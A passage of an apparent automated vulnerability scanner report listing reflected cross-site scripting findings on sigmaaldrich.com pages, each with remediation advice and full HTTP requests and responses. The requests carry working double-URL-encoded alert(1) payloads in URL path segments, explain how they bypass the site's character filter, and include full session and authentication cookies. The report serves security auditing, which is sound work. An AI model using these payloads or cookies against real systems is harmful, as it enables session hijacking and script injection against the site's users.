Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:26 GMT
Content-Length: 28976
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contentaaf93";alert(1)//d613d4dcd48/sigma-aldrich/the-americas/united-states/jai-nagarkatti-memoriam","E404") ;
   </script>
...[SNIP]...

1.233. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/jai-nagarkatti-memoriam [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/jai-nagarkatti-memoriam

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9e32%2522%253balert%25281%2529%252f%252f2a81cf996cb was submitted in the REST URL parameter 2. This input was echoed as e9e32";alert(1)//2a81cf996cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldriche9e32%2522%253balert%25281%2529%252f%252f2a81cf996cb/the-americas/united-states/jai-nagarkatti-memoriam HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:28 GMT
Content-Length: 28976
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldriche9e32";alert(1)//2a81cf996cb/the-americas/united-states/jai-nagarkatti-memoriam","E404") ;
   </script>
...[SNIP]...

1.234. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/jai-nagarkatti-memoriam [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/jai-nagarkatti-memoriam

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c374d%2522%253balert%25281%2529%252f%252f290bcd61e98 was submitted in the REST URL parameter 3. This input was echoed as c374d";alert(1)//290bcd61e98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/the-americasc374d%2522%253balert%25281%2529%252f%252f290bcd61e98/united-states/jai-nagarkatti-memoriam HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:29 GMT
Content-Length: 28976
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/the-americasc374d";alert(1)//290bcd61e98/united-states/jai-nagarkatti-memoriam","E404") ;
   </script>
...[SNIP]...

1.235. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/jai-nagarkatti-memoriam [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/jai-nagarkatti-memoriam

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 479f7%2522%253balert%25281%2529%252f%252f24dcf70337a was submitted in the REST URL parameter 4. This input was echoed as 479f7";alert(1)//24dcf70337a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/the-americas/united-states479f7%2522%253balert%25281%2529%252f%252f24dcf70337a/jai-nagarkatti-memoriam HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:31 GMT
Content-Length: 28976
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/the-americas/united-states479f7";alert(1)//24dcf70337a/jai-nagarkatti-memoriam","E404") ;
   </script>
...[SNIP]...

1.236. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/jai-nagarkatti-memoriam [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/jai-nagarkatti-memoriam

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 257c5%2522%253balert%25281%2529%252f%252f91b0ff44e5 was submitted in the REST URL parameter 5. This input was echoed as 257c5";alert(1)//91b0ff44e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/the-americas/united-states/jai-nagarkatti-memoriam257c5%2522%253balert%25281%2529%252f%252f91b0ff44e5 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:33 GMT
Content-Length: 28975
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/the-americas/united-states/jai-nagarkatti-memoriam257c5";alert(1)//91b0ff44e5","E404") ;
   </script>
...[SNIP]...

1.237. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/ordering [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/ordering

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2626f%2522%253balert%25281%2529%252f%252fd734e82c357 was submitted in the REST URL parameter 1. This input was echoed as 2626f";alert(1)//d734e82c357 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content2626f%2522%253balert%25281%2529%252f%252fd734e82c357/sigma-aldrich/the-americas/united-states/ordering HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
